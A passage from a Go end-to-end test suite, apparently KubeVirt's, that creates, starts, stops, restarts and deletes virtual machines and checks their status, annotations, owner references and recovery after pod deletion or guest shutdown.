Expect(err).Should(HaveOccurred())
})
It("should fail to start when a volume is backed by PVC created by DataVolume instead of the DataVolume itself", func() {
dv := tests.NewRandomDataVolumeWithHttpImport(tests.GetUrl(tests.AlpineHttpUrl), tests.NamespaceTestDefault, k8sv1.ReadWriteOnce)
_, err := virtClient.CdiClient().CdiV1alpha1().DataVolumes(dv.Namespace).Create(dv)
Expect(err).To(BeNil())
defer func(dv *cdiv1.DataVolume) {
By("Deleting the DataVolume")
ExpectWithOffset(1, virtClient.CdiClient().CdiV1alpha1().DataVolumes(dv.Namespace).Delete(dv.Name, &metav1.DeleteOptions{})).To(Succeed())
}(dv)
tests.WaitForSuccessfulDataVolumeImport(dv, 60)
vmi := tests.NewRandomVMI()
vmi.Spec.Domain.Resources.Requests[k8sv1.ResourceMemory] = resource.MustParse("64M")
diskName := "disk0"
bus := "virtio"
vmi.Spec.Domain.Devices.Disks = append(vmi.Spec.Domain.Devices.Disks, v1.Disk{
Name: diskName,
DiskDevice: v1.DiskDevice{
Disk: &v1.DiskTarget{
Bus: bus,
},
},
})
vmi.Spec.Volumes = append(vmi.Spec.Volumes, v1.Volume{
Name: diskName,
VolumeSource: v1.VolumeSource{
PersistentVolumeClaim: &k8sv1.PersistentVolumeClaimVolumeSource{
ClaimName: dv.ObjectMeta.Name,
},
},
})
vmi.Spec.Domain.Resources.Requests[k8sv1.ResourceMemory] = resource.MustParse("512M")
vm := tests.NewRandomVirtualMachine(vmi, true)
_, err = virtClient.VirtualMachine(tests.NamespaceTestDefault).Create(vm)
Expect(err).ShouldNot(HaveOccurred())
Eventually(func() bool {
vm, err := virtClient.VirtualMachine(vm.Namespace).Get(vm.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return vm.Status.Created
}, 30*time.Second, 1*time.Second).Should(Equal(false))
})
})
Context("A mutated VirtualMachine given", func() {
var testingMachineType string = "pc-q35-2.7"
BeforeEach(func() {
_, err := virtClient.CoreV1().ConfigMaps(tests.KubeVirtInstallNamespace).Get("kubevirt-config", metav1.GetOptions{})
if err != nil && !errors.IsNotFound(err) {
Expect(err).ToNot(HaveOccurred())
}
if errors.IsNotFound(err) {
// create an empty kubevirt-config configmap if none exists.
cfgMap := &k8sv1.ConfigMap{
ObjectMeta: metav1.ObjectMeta{Name: "kubevirt-config"},
Data: map[string]string{
"machine-type": testingMachineType,
},
}
_, err = virtClient.CoreV1().ConfigMaps(tests.KubeVirtInstallNamespace).Create(cfgMap)
Expect(err).ToNot(HaveOccurred())
} else if err == nil {
tests.UpdateClusterConfigValueAndWait("machine-type", testingMachineType)
}
})
newVirtualMachineInstanceWithContainerDisk := func() (*v1.VirtualMachineInstance, *cdiv1.DataVolume) {
vmiImage := tests.ContainerDiskFor(tests.ContainerDiskCirros)
return tests.NewRandomVMIWithEphemeralDiskAndUserdata(vmiImage, "echo Hi\n"), nil
}
createVirtualMachine := func(running bool, template *v1.VirtualMachineInstance) *v1.VirtualMachine {
By("Creating VirtualMachine")
vm := tests.NewRandomVirtualMachine(template, running)
newVM, err := virtClient.VirtualMachine(tests.NamespaceTestDefault).Create(vm)
Expect(err).ToNot(HaveOccurred())
return newVM
}
It("[test_id:3312]should set the default MachineType when created without explicit value", func() {
By("Creating VirtualMachine")
template, _ := newVirtualMachineInstanceWithContainerDisk()
template.Spec.Domain.Machine.Type = ""
vm := createVirtualMachine(false, template)
createdVM, err := virtClient.VirtualMachine(vm.Namespace).Get(vm.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(createdVM.Spec.Template.Spec.Domain.Machine.Type).To(Equal(testingMachineType))
})
It("[test_id:3311]should keep the supplied MachineType when created", func() {
By("Creating VirtualMachine")
explicitMachineType := "pc-q35-3.0"
template, _ := newVirtualMachineInstanceWithContainerDisk()
template.Spec.Domain.Machine.Type = explicitMachineType
vm := createVirtualMachine(false, template)
createdVM, err := virtClient.VirtualMachine(vm.Namespace).Get(vm.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(createdVM.Spec.Template.Spec.Domain.Machine.Type).To(Equal(explicitMachineType))
})
})
Context("A valid VirtualMachine given", func() {
type vmiBuilder func() (*v1.VirtualMachineInstance, *cdiv1.DataVolume)
newVirtualMachineInstanceWithContainerDisk := func() (*v1.VirtualMachineInstance, *cdiv1.DataVolume) {
vmiImage := tests.ContainerDiskFor(tests.ContainerDiskCirros)
return tests.NewRandomVMIWithEphemeralDiskAndUserdata(vmiImage, "echo Hi\n"), nil
}
newVirtualMachineInstanceWithOCSFileDisk := func() (*v1.VirtualMachineInstance, *cdiv1.DataVolume) {
return tests.NewRandomVirtualMachineInstanceWithOCSDisk(tests.GetUrl(tests.AlpineHttpUrl), tests.NamespaceTestDefault, v13.ReadWriteOnce, v13.PersistentVolumeFilesystem)
}
newVirtualMachineInstanceWithOCSBlockDisk := func() (*v1.VirtualMachineInstance, *cdiv1.DataVolume) {
return tests.NewRandomVirtualMachineInstanceWithOCSDisk(tests.GetUrl(tests.AlpineHttpUrl), tests.NamespaceTestDefault, v13.ReadWriteOnce, v13.PersistentVolumeBlock)
}
deleteDataVolume := func(dv *cdiv1.DataVolume) {
if dv != nil {
By("Deleting the DataVolume")
ExpectWithOffset(1, virtClient.CdiClient().CdiV1alpha1().DataVolumes(dv.Namespace).Delete(dv.Name, &metav1.DeleteOptions{})).To(Succeed())
}
}
createVirtualMachine := func(running bool, template *v1.VirtualMachineInstance) *v1.VirtualMachine {
By("Creating VirtualMachine")
vm := tests.NewRandomVirtualMachine(template, running)
newVM, err := virtClient.VirtualMachine(tests.NamespaceTestDefault).Create(vm)
Expect(err).ToNot(HaveOccurred())
return newVM
}
newVirtualMachine := func(running bool) *v1.VirtualMachine {
template, _ := newVirtualMachineInstanceWithContainerDisk()
return createVirtualMachine(running, template)
}
newVirtualMachineWithRunStrategy := func(runStrategy v1.VirtualMachineRunStrategy) *v1.VirtualMachine {
vmiImage := tests.ContainerDiskFor(tests.ContainerDiskCirros)
template := tests.NewRandomVMIWithEphemeralDiskAndUserdata(vmiImage, "echo Hi\n")
var newVM *v1.VirtualMachine
var err error
newVM = NewRandomVirtualMachineWithRunStrategy(template, runStrategy)
newVM, err = virtClient.VirtualMachine(tests.NamespaceTestDefault).Create(newVM)
Expect(err).ToNot(HaveOccurred())
return newVM
}
startVM := func(vm *v1.VirtualMachine) *v1.VirtualMachine {
By("Starting the VirtualMachine")
Eventually(func() error {
updatedVM, err := virtClient.VirtualMachine(vm.Namespace).Get(vm.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
updatedVM.Spec.Running = nil
updatedVM.Spec.RunStrategy = &runStrategyAlways
_, err = virtClient.VirtualMachine(updatedVM.Namespace).Update(updatedVM)
return err
}, 300*time.Second, 1*time.Second).ShouldNot(HaveOccurred())
updatedVM, err := virtClient.VirtualMachine(vm.Namespace).Get(vm.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
// Observe the VirtualMachineInstance created
Eventually(func() error {
_, err := virtClient.VirtualMachineInstance(updatedVM.Namespace).Get(updatedVM.Name, &v12.GetOptions{})
return err
}, 300*time.Second, 1*time.Second).Should(Succeed())
By("VMI has the running condition")
Eventually(func() bool {
vm, err := virtClient.VirtualMachine(updatedVM.Namespace).Get(updatedVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return vm.Status.Ready
}, 300*time.Second, 1*time.Second).Should(BeTrue())
return updatedVM
}
stopVM := func(vm *v1.VirtualMachine) *v1.VirtualMachine {
By("Stopping the VirtualMachine")
err = tests.RetryWithMetadataIfModified(vm.ObjectMeta, func(meta v12.ObjectMeta) error {
updatedVM, err := virtClient.VirtualMachine(meta.Namespace).Get(meta.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
updatedVM.Spec.Running = nil
updatedVM.Spec.RunStrategy = &runStrategyHalted
_, err = virtClient.VirtualMachine(meta.Namespace).Update(updatedVM)
return err
})
Expect(err).ToNot(HaveOccurred())
updatedVM, err := virtClient.VirtualMachine(vm.Namespace).Get(vm.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
// Observe the VirtualMachineInstance deleted
Eventually(func() bool {
_, err = virtClient.VirtualMachineInstance(updatedVM.Namespace).Get(updatedVM.Name, &v12.GetOptions{})
if errors.IsNotFound(err) {
return true
}
return false
}, 300*time.Second, 1*time.Second).Should(BeTrue(), "The vmi did not disappear")
By("VMI has not the running condition")
Eventually(func() bool {
vm, err := virtClient.VirtualMachine(updatedVM.Namespace).Get(updatedVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return vm.Status.Ready
}, 300*time.Second, 1*time.Second).Should(BeFalse())
return updatedVM
}
startVMIDontWait := func(vm *v1.VirtualMachine) *v1.VirtualMachine {
By("Starting the VirtualMachineInstance")
err := tests.RetryWithMetadataIfModified(vm.ObjectMeta, func(meta v12.ObjectMeta) error {
updatedVM, err := virtClient.VirtualMachine(meta.Namespace).Get(meta.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
updatedVM.Spec.Running = nil
updatedVM.Spec.RunStrategy = &runStrategyAlways
_, err = virtClient.VirtualMachine(meta.Namespace).Update(updatedVM)
return err
})
Expect(err).ToNot(HaveOccurred())
updatedVM, err := virtClient.VirtualMachine(vm.Namespace).Get(vm.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return updatedVM
}
It("[test_id:3161]should carry annotations to VMI", func() {
annotations := map[string]string{
"testannotation": "test",
}
vm := newVirtualMachine(false)
err = tests.RetryWithMetadataIfModified(vm.ObjectMeta, func(meta v12.ObjectMeta) error {
vm, err = virtClient.VirtualMachine(meta.Namespace).Get(meta.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
vm.Spec.Template.ObjectMeta.Annotations = annotations
vm, err = virtClient.VirtualMachine(meta.Namespace).Update(vm)
return err
})
Expect(err).ToNot(HaveOccurred())
startVMIDontWait(vm)
By("checking for annotations to be present")
Eventually(func() map[string]string {
vmi, err := virtClient.VirtualMachineInstance(vm.Namespace).Get(vm.Name, &v12.GetOptions{})
if err != nil {
return map[string]string{}
}
return vmi.Annotations
			}, 300*time.Second, 1*time.Second).Should(HaveKeyWithValue("testannotation", "test"), "VM should start normally.")
})
It("[test_id:3162]should ignore kubernetes and kubevirt annotations to VMI", func() {
annotations := map[string]string{
"kubevirt.io/test": "test",
"kubernetes.io/test": "test",
}
vm := newVirtualMachine(false)
err = tests.RetryWithMetadataIfModified(vm.ObjectMeta, func(meta v12.ObjectMeta) error {
vm, err = virtClient.VirtualMachine(meta.Namespace).Get(meta.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
vm.Annotations = annotations
vm, err = virtClient.VirtualMachine(meta.Namespace).Update(vm)
return err
})
Expect(err).ToNot(HaveOccurred())
startVMIDontWait(vm)
By("checking for annotations to not be present")
vmi := &v1.VirtualMachineInstance{}
Eventually(func() error {
vmi, err = virtClient.VirtualMachineInstance(vm.Namespace).Get(vm.Name, &v12.GetOptions{})
return err
}, 300*time.Second, 1*time.Second).ShouldNot(HaveOccurred(), "VMI should be created normaly.")
Expect(vmi.Annotations).ShouldNot(HaveKey("kubevirt.io/test"), "kubevirt internal annotations should be ignored")
Expect(vmi.Annotations).ShouldNot(HaveKey("kubernetes.io/test"), "kubernetes internal annotations should be ignored")
})
table.DescribeTable("[test_id:1520]should update VirtualMachine once VMIs are up", func(createTemplate vmiBuilder) {
template, dv := createTemplate()
defer deleteDataVolume(dv)
newVM := createVirtualMachine(true, template)
Eventually(func() bool {
vm, err := virtClient.VirtualMachine(tests.NamespaceTestDefault).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return vm.Status.Ready
}, 300*time.Second, 1*time.Second).Should(BeTrue())
},
table.Entry("with ContainerDisk", newVirtualMachineInstanceWithContainerDisk),
table.Entry("with OCS Filesystem Disk", newVirtualMachineInstanceWithOCSFileDisk),
table.Entry("with OCS Block Disk", newVirtualMachineInstanceWithOCSBlockDisk),
)
table.DescribeTable("[test_id:1521]should remove VirtualMachineInstance once the VM is marked for deletion", func(createTemplate vmiBuilder) {
template, dv := createTemplate()
defer deleteDataVolume(dv)
newVM := createVirtualMachine(true, template)
// Delete it
Expect(virtClient.VirtualMachine(newVM.Namespace).Delete(newVM.Name, &v12.DeleteOptions{})).To(Succeed())
// Wait until VMI is gone
Eventually(func() int {
vmis, err := virtClient.VirtualMachineInstance(newVM.Namespace).List(&v12.ListOptions{})
Expect(err).ToNot(HaveOccurred())
return len(vmis.Items)
}, 300*time.Second, 2*time.Second).Should(BeZero(), "The VirtualMachineInstance did not disappear")
},
table.Entry("with ContainerDisk", newVirtualMachineInstanceWithContainerDisk),
table.Entry("with OCS Filesystem Disk", newVirtualMachineInstanceWithOCSFileDisk),
table.Entry("with OCS Block Disk", newVirtualMachineInstanceWithOCSBlockDisk),
)
It("[test_id:1522]should remove owner references on the VirtualMachineInstance if it is orphan deleted", func() {
// Cascade=false delete fails in ocp 3.11 with CRDs that contain multiple versions.
tests.SkipIfOpenShiftAndBelowOrEqualVersion("cascade=false delete does not work with CRD multi version support in ocp 3.11", "1.11.0")
newVM := newVirtualMachine(true)
By("Getting owner references")
Eventually(func() []v12.OwnerReference {
// Check for owner reference
vmi, _ := virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
return vmi.OwnerReferences
}, 300*time.Second, 1*time.Second).ShouldNot(BeEmpty())
// Delete it
orphanPolicy := v12.DeletePropagationOrphan
By("Deleting VM")
Expect(virtClient.VirtualMachine(newVM.Namespace).
Delete(newVM.Name, &v12.DeleteOptions{PropagationPolicy: &orphanPolicy})).To(Succeed())
// Wait until the virtual machine is deleted
By("Waiting for VM to delete")
Eventually(func() bool {
_, err := virtClient.VirtualMachine(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
if errors.IsNotFound(err) {
return true
}
return false
}, 300*time.Second, 1*time.Second).Should(BeTrue())
By("Verifying orphaned VMI still exists")
vmi, err := virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(vmi.OwnerReferences).To(BeEmpty())
Expect(err).ToNot(HaveOccurred())
})
It("[test_id:1523]should recreate VirtualMachineInstance if it gets deleted", func() {
newVM := startVM(newVirtualMachine(false))
currentVMI, err := virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(virtClient.VirtualMachineInstance(newVM.Namespace).Delete(newVM.Name, &v12.DeleteOptions{})).To(Succeed())
Eventually(func() bool {
vmi, err := virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
if errors.IsNotFound(err) {
return false
}
if vmi.UID != currentVMI.UID {
return true
}
return false
}, 240*time.Second, 1*time.Second).Should(BeTrue())
})
It("[test_id:1524]should recreate VirtualMachineInstance if the VirtualMachineInstance's pod gets deleted", func() {
var firstVMI *v1.VirtualMachineInstance
var curVMI *v1.VirtualMachineInstance
var err error
By("Start a new VM")
newVM := newVirtualMachine(true)
// wait for a running VirtualMachineInstance.
By("Waiting for the VM's VirtualMachineInstance to start")
Eventually(func() error {
firstVMI, err = virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
if err != nil {
return err
}
if !firstVMI.IsRunning() {
return fmt.Errorf("vmi still isn't running")
}
return nil
}, 120*time.Second, 1*time.Second).Should(Succeed())
// get the pod backing the VirtualMachineInstance
By("Getting the pod backing the VirtualMachineInstance")
pods, err := virtClient.CoreV1().Pods(newVM.Namespace).List(tests.UnfinishedVMIPodSelector(firstVMI))
Expect(err).ToNot(HaveOccurred())
Expect(len(pods.Items)).To(Equal(1))
firstPod := pods.Items[0]
// Delete the Pod
By("Deleting the VirtualMachineInstance's pod")
Eventually(func() error {
return virtClient.CoreV1().Pods(newVM.Namespace).Delete(firstPod.Name, &v12.DeleteOptions{})
}, 120*time.Second, 1*time.Second).Should(Succeed())
// Wait on the VMI controller to create a new VirtualMachineInstance
By("Waiting for a new VirtualMachineInstance to spawn")
Eventually(func() bool {
curVMI, err = virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
// verify a new VirtualMachineInstance gets created for the VM after the Pod is deleted.
if errors.IsNotFound(err) {
return false
} else if string(curVMI.UID) == string(firstVMI.UID) {
return false
} else if !curVMI.IsRunning() {
return false
}
return true
}, 120*time.Second, 1*time.Second).Should(BeTrue())
// sanity check that the test ran correctly by
// verifying a different Pod backs the VMI as well.
By("Verifying a new pod backs the VMI")
pods, err = virtClient.CoreV1().Pods(newVM.Namespace).List(tests.UnfinishedVMIPodSelector(curVMI))
Expect(err).ToNot(HaveOccurred())
Expect(len(pods.Items)).To(Equal(1))
pod := pods.Items[0]
Expect(pod.Name).ToNot(Equal(firstPod.Name))
})
table.DescribeTable("[test_id:1525]should stop VirtualMachineInstance if running set to false", func(createTemplate vmiBuilder) {
template, dv := createTemplate()
defer deleteDataVolume(dv)
vm := createVirtualMachine(false, template)
vm = startVM(vm)
vm = stopVM(vm)
},
table.Entry("with ContainerDisk", newVirtualMachineInstanceWithContainerDisk),
table.Entry("with OCS Filesystem Disk", newVirtualMachineInstanceWithOCSFileDisk),
table.Entry("with OCS Block Disk", newVirtualMachineInstanceWithOCSBlockDisk),
)
It("[test_id:1526]should start and stop VirtualMachineInstance multiple times", func() {
vm := newVirtualMachine(false)
// Start and stop VirtualMachineInstance multiple times
for i := 0; i < 5; i++ {
By(fmt.Sprintf("Doing run: %d", i))
startVM(vm)
stopVM(vm)
}
})
It("[test_id:1527]should not update the VirtualMachineInstance spec if Running", func() {
newVM := newVirtualMachine(true)
Eventually(func() bool {
newVM, err = virtClient.VirtualMachine(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return newVM.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
By("Updating the VM template spec")
newVM, err = virtClient.VirtualMachine(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
updatedVM := newVM.DeepCopy()
updatedVM.Spec.Template.Spec.Domain.Resources.Requests = v13.ResourceList{
v13.ResourceMemory: resource.MustParse("4096Ki"),
}
updatedVM, err := virtClient.VirtualMachine(updatedVM.Namespace).Update(updatedVM)
Expect(err).ToNot(HaveOccurred())
By("Expecting the old VirtualMachineInstance spec still running")
vmi, err := virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
vmiMemory := vmi.Spec.Domain.Resources.Requests.Memory()
vmMemory := newVM.Spec.Template.Spec.Domain.Resources.Requests.Memory()
Expect(vmiMemory.Cmp(*vmMemory)).To(Equal(0))
By("Restarting the VM")
newVM = stopVM(newVM)
newVM = startVM(newVM)
By("Expecting updated spec running")
vmi, err = virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
vmiMemory = vmi.Spec.Domain.Resources.Requests.Memory()
vmMemory = updatedVM.Spec.Template.Spec.Domain.Resources.Requests.Memory()
Expect(vmiMemory.Cmp(*vmMemory)).To(Equal(0))
})
It("[test_id:1528]should survive guest shutdown, multiple times", func() {
By("Creating new VM, not running")
newVM := newVirtualMachine(false)
newVM = startVM(newVM)
var vmi *v1.VirtualMachineInstance
for i := 0; i < 3; i++ {
currentVMI, err := virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
By("Getting the running VirtualMachineInstance")
Eventually(func() bool {
vmi, err = virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return vmi.Status.Phase == v1.Running
}, 240*time.Second, 1*time.Second).Should(BeTrue())
By("Obtaining the serial console")
expecter, err := tests.LoggedInCirrosExpecter(vmi)
Expect(err).ToNot(HaveOccurred())
defer expecter.Close()
By("Guest shutdown")
_, err = expecter.ExpectBatch([]expect.Batcher{
&expect.BSnd{S: "sudo poweroff\n"},
&expect.BExp{R: "The system is going down NOW!"},
}, 240*time.Second)
Expect(err).ToNot(HaveOccurred())
By("waiting for the controller to replace the shut-down vmi with a new instance")
Eventually(func() bool {
vmi, err = virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
// Almost there, a new instance should be spawned soon
if errors.IsNotFound(err) {
return false
}
Expect(err).ToNot(HaveOccurred())
// If the UID of the vmi changed we see the new vmi
if vmi.UID != currentVMI.UID {
return true
}
return false
}, 240*time.Second, 1*time.Second).Should(BeTrue(), "No new VirtualMachineInstance instance showed up")
By("VMI should run the VirtualMachineInstance again")
}
})
It("should set the Ready condition on VM", func() {
vm := newVirtualMachine(false)
vmReadyConditionStatus := func() k8sv1.ConditionStatus {
updatedVm, err := virtClient.VirtualMachine(vm.Namespace).Get(vm.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
cond := controller.NewVirtualMachineConditionManager().
GetCondition(updatedVm, v1.VirtualMachineReady)
if cond == nil {
return ""
}
return cond.Status
}
Expect(vmReadyConditionStatus()).To(BeEmpty())
startVM(vm)
Eventually(vmReadyConditionStatus, 300*time.Second, 1*time.Second).
Should(Equal(k8sv1.ConditionTrue))
stopVM(vm)
Eventually(vmReadyConditionStatus, 300*time.Second, 1*time.Second).
Should(BeEmpty())
})
Context("Using virtctl interface", func() {
It("[test_id:1529]should start a VirtualMachineInstance once", func() {
By("getting a VM")
newVM := newVirtualMachine(false)
By("Invoking virtctl start")
startCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_START, "--namespace", newVM.Namespace, newVM.Name)
Expect(startCommand()).To(Succeed())
By("Getting the status of the VM")
Eventually(func() bool {
newVM, err = virtClient.VirtualMachine(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return newVM.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
By("Getting the running VirtualMachineInstance")
Eventually(func() bool {
vmi, err := virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return vmi.Status.Phase == v1.Running
}, 240*time.Second, 1*time.Second).Should(BeTrue())
By("Ensuring a second invocation should fail")
err = startCommand()
Expect(err).To(HaveOccurred())
Expect(err.Error()).To(Equal(fmt.Sprintf(`Error starting VirtualMachine Operation cannot be fulfilled on virtualmachine.kubevirt.io "%s": VM is already running`, newVM.Name)))
})
It("[test_id:1530]should stop a VirtualMachineInstance once", func() {
By("getting a VM")
newVM := newVirtualMachine(true)
By("Ensuring VM is running")
Eventually(func() bool {
newVM, err = virtClient.VirtualMachine(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return newVM.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
By("Invoking virtctl stop")
stopCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_STOP, "--namespace", newVM.Namespace, newVM.Name)
Expect(stopCommand()).To(Succeed())
By("Ensuring VM is not running")
Eventually(func() bool {
newVM, err = virtClient.VirtualMachine(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return !newVM.Status.Ready && !newVM.Status.Created
}, 360*time.Second, 1*time.Second).Should(BeTrue())
By("Ensuring the VirtualMachineInstance is removed")
Eventually(func() error {
_, err = virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
// Expect a 404 error
return err
}, 240*time.Second, 1*time.Second).Should(HaveOccurred())
By("Ensuring a second invocation should fail")
err = stopCommand()
Expect(err).ToNot(Succeed())
Expect(err.Error()).To(Equal(fmt.Sprintf(`Error stopping VirtualMachine Operation cannot be fulfilled on virtualmachine.kubevirt.io "%s": VM is not running`, newVM.Name)))
})
It("[test_id:3007]Should force restart a VM with terminationGracePeriodSeconds>0", func() {
By("getting a VM with high TerminationGracePeriod")
newVMI := tests.NewRandomVMIWithEphemeralDisk(tests.ContainerDiskFor(tests.ContainerDiskFedora))
gracePeriod := int64(600)
newVMI.Spec.TerminationGracePeriodSeconds = &gracePeriod
newVM := tests.NewRandomVirtualMachine(newVMI, true)
_, err := virtClient.VirtualMachine(newVM.Namespace).Create(newVM)
Expect(err).ToNot(HaveOccurred())
waitForVMIStart(virtClient, newVMI)
oldCreationTime := newVMI.ObjectMeta.CreationTimestamp
oldVMIUuid := newVM.ObjectMeta.UID
By("Invoking virtctl --force restart")
forceRestart := tests.NewRepeatableVirtctlCommand(vm.COMMAND_RESTART, "--namespace", newVM.Namespace, "--force", newVM.Name, "--grace-period=0")
err = forceRestart()
Expect(err).ToNot(HaveOccurred())
zeroGracePeriod := int64(0)
// Checks if the old VMI Pod still exists after force-restart command
Eventually(func() string {
pod, err := tests.GetRunningPodByLabel(string(oldVMIUuid), v1.CreatedByLabel, newVM.Namespace, "")
if err != nil {
return err.Error()
}
if pod.GetDeletionGracePeriodSeconds() != nil && *pod.GetDeletionGracePeriodSeconds() == zeroGracePeriod && pod.GetDeletionTimestamp() != nil {
return "old VMI Pod still not deleted"
}
return ""
}, 120*time.Second, 1*time.Second).Should(ContainSubstring("failed to find pod"))
waitForNewVMI(virtClient, newVMI)
By("Comparing the new CreationTimeStamp with the old one")
newVMI, err = virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(oldCreationTime).ToNot(Equal(newVMI.ObjectMeta.CreationTimestamp))
Expect(oldVMIUuid).ToNot(Equal(newVMI.ObjectMeta.UID))
})
Context("Using RunStrategyAlways", func() {
It("[test_id:3163]should stop a running VM", func() {
By("creating a VM with RunStrategyAlways")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyAlways)
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
By("Invoking virtctl stop")
stopCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_STOP, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
Expect(stopCommand()).To(Succeed())
By("Ensuring the VirtualMachineInstance is removed")
Eventually(func() error {
_, err = virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
// Expect a 404 error
return err
}, 240*time.Second, 1*time.Second).Should(HaveOccurred())
newVM, err := virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(newVM.Spec.RunStrategy).ToNot(BeNil())
Expect(*newVM.Spec.RunStrategy).To(Equal(v1.RunStrategyHalted))
Expect(len(newVM.Status.StateChangeRequests)).To(Equal(0))
})
It("[test_id:3164]should restart a running VM", func() {
By("creating a VM with RunStrategyAlways")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyAlways)
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
By("Getting VM's UUID")
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
currentUUID := virtualMachine.UID
By("Invoking virtctl restart")
restartCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_RESTART, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
Expect(restartCommand()).To(Succeed())
By("Ensuring the VirtualMachineInstance is restarted")
Eventually(func() types.UID {
nextVMI, err := virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
if err != nil {
// a 404 could happen normally while the VMI transitions
if !errors.IsNotFound(err) {
Expect(err).ToNot(HaveOccurred())
}
// If there's no VMI, just return the last known UUID
return currentUUID
}
return nextVMI.UID
}, 240*time.Second, 1*time.Second).ShouldNot(Equal(currentUUID))
newVM, err := virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(newVM.Spec.RunStrategy).ToNot(BeNil())
Expect(*newVM.Spec.RunStrategy).To(Equal(v1.RunStrategyAlways))
// StateChangeRequest might still exist until the new VMI is created
// But it must eventually be cleared
Eventually(func() int {
newVM, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return len(newVM.Status.StateChangeRequests)
}, 240*time.Second, 1*time.Second).Should(Equal(0),
"New VMI was created, but StateChangeRequest was never cleared")
})
It("[test_id:3165]should restart a succeeded VMI", func() {
By("creating a VM with RunStategyRunning")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyAlways)
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
